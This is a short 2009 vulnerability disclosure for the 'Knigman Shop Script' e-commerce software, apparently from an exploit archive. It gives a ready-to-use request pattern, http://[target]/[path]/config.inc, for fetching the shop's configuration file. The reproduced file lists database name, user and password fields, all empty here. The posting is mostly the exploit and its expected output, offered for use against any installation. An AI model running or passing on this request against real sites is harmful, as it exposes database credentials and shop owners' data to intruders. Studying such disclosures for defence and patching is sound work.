knigman-disclose.txt
Posted on 22 July 2009
< ------------------- header data start ------------------- > ############################################################# # Application Name : Knigman Shop Script # Vulnerable Type : Arbitrary Database Config Disclosure Vulnerability # Infection : SQL Info Get... # Author : Septemb0x # Script Down.& WebSite : http://knigman.net/buy.php?tovid=22764 & http://s2.dosya.tc/knigman.zip.html ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > EXPLOIT : http://[target]/[path]/config.inc GET TO; <? $ashopname = ""; $ashopphone = ""; $ashopemail = ""; $ashopaddress = ""; $ashopurl = ""; $databasename = ""; $databaseuser = ""; $databasepasswd = ""; $orderrecipient = ""; $ordersubject = ""; $timezoneoffset = ; $affiliateinfo = ""; $affiliaterecipient = ""; ?> < -- bug code end of -- > _________________________________________________________________ http://www.microsoft.com/turkiye/windows/windowslive/products/photos-share.aspx?tab=1
